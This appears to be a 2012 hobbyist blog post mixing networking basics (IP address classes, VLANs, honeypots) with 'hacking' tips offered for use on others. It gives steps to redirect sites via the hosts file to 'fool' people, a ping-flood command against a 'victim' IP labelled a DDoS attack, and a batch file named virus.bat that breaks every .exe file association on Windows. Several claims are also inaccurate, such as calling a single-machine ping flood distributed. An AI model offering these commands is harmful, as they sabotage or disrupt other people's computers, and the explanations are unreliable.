Tuesday, 3 January 2012

DNS SPOOFING

DNS SPOOFING-DNS stands for Domin Name Services and spoofing means to make people fool
In DNS spoofing for example a person open a browser and type a url like www.google.com in actual situation a person who request for google page can redirect to google.But in DNS SPOOFING that person redirect to another website like www.abc.com
simple steps to do this:
GO to
C:/->windows->system32->drivers->etc->hosts
goto end of host file
Now cmd->nslookup->filehippo.com=this will show the ip of filehippo.com
paste it into host file and write name of any website like www.google.com
Now whenever a person goto his browser and type www.google.com it will automatically redirect to www.filehippo.com
NOTE:THIS IS ONLY VALID IN XP OS
if any kind of problem occurs then flush the dns by the command
cmd->ipconfig/flushdns=it will clear all the saved dns
and also remove all the cookies from the browser.

IP ADDRESS

IP stands for internet protocol
It is a logical address,which is used to uniquely identify a particular system on network.
two types of ip available now
1.ipv4(internet protocol version 4)->it consist of 32bits
2.ipv6(internet protocol version 6)->it consists of 128bits
Now ip address is consist of combination of NETWORK ID and HOST ID
IP addresses are divided into 5 classes
1. class A(0-127)
2. class B(128-191)
3. class C(192-223)
4. class D(224-239)
5. class E(240-255)

DDOS ATTACK

DDOS-Stands for Distributed Denial Of Service
Goto run->cmd
type command
ping -l 65000 -n 50000 ip of victim(192.168.12.1)
it is used to sent many thousands of packets to hang the other system,,to avoid this we can use IDS(Intrusion Detection System) i.e a software installed on pc which detect the unauthorized user.

The Virtual Local Area Network (VLAN)


Short for virtual LAN, a network of computers that behave as if they are connected to the same wire even though they may actually be physically located on different segments of a LAN. VLANs are configured throughsoftware rather than hardware, which makes them extremely flexible. One of the biggest advantages of VLANs is that when a computer is physically moved to another location, it can stay on the same VLAN without any hardware reconfiguration.


How to corrupt all .exe files in xp or win7

Easy steps to corrupt exefiles
1.open notepad
2.write: assoc.exe=hack(or anything)
3.save it with .bat extension,,,like virus.bat
4.double click on that .bat file
5. boom..all the exe files were corrupted
To make it as original
*Just go to that .bat file which a virus
*Right click on it->edit
*Now write:assoc.exe=exefile
*Save it with .bat extension,,,like patch.bat
*Now all the exefiles are working correctly.

Shutdown your pc using cmd

shutdown -s -t 00
s-stands for shutdown
t-time
00 is timing to shut it down,it may be 00 to 10 mins 3:)

HONEYPOT

A Honeypot can be characterized as a closely monitored network decoy serving several purposes. Honeypots can be set up to run any type of operating system and any number of services. The value of a Honeypot is directly proportional to the amount and type of information we can successfully obtain from it. Aside from information gathering, a Honeypot has the capabilities of distracting adversaries from more valuable machines on a network, and can provide early warning signs about a new type of attack or exploitation trends, and allows in-depth examination of adversaries during or after exploitation of a host. Another function that a Honeypot allows is the capturing the keystrokes typed by an adversary attempting to compromise the Honeypot – this provides particularly interesting insight if an intruder uses the compromised host as an IRC chat server. Two levels of Honeypots are described as low interaction and high-interaction.
Their currently exist two types of Honeypots: a physical Honeypot which is a real machine with its own IP address, and a virtual Honeypot which is simulated by another machine that responds to network traffic. Physical Honeypots are often labeled as high-interaction because the system can be completely compromised and are resource expensive to install and maintain. For example - if you wanted to implement physical Honeypots for a certain range of IPs on your LAN you would have to build a separate instance of a Honeypot for each physical IP address. Virtual Honeypots are often labeled as low interaction because of the low implementation and maintenance costs. A virtual Honeypot can simulate multiple Operating Systems, services and a separate TCP/IP stack for each instance of a Honeypot on that one machine. Honeyd is an example of a virtual honeypot service; simulating the TCP/IP stack of multiple target operating systems in order to fool TCP/IP stack fingerprinting by tools like Nmap and Xprobe. Virtual Honeypots are used more often than physical Honeypots because they require fewer computer systems, which in turn reduces maintenance costs, and also allows for a greater variety of hosts to be deployed and observed.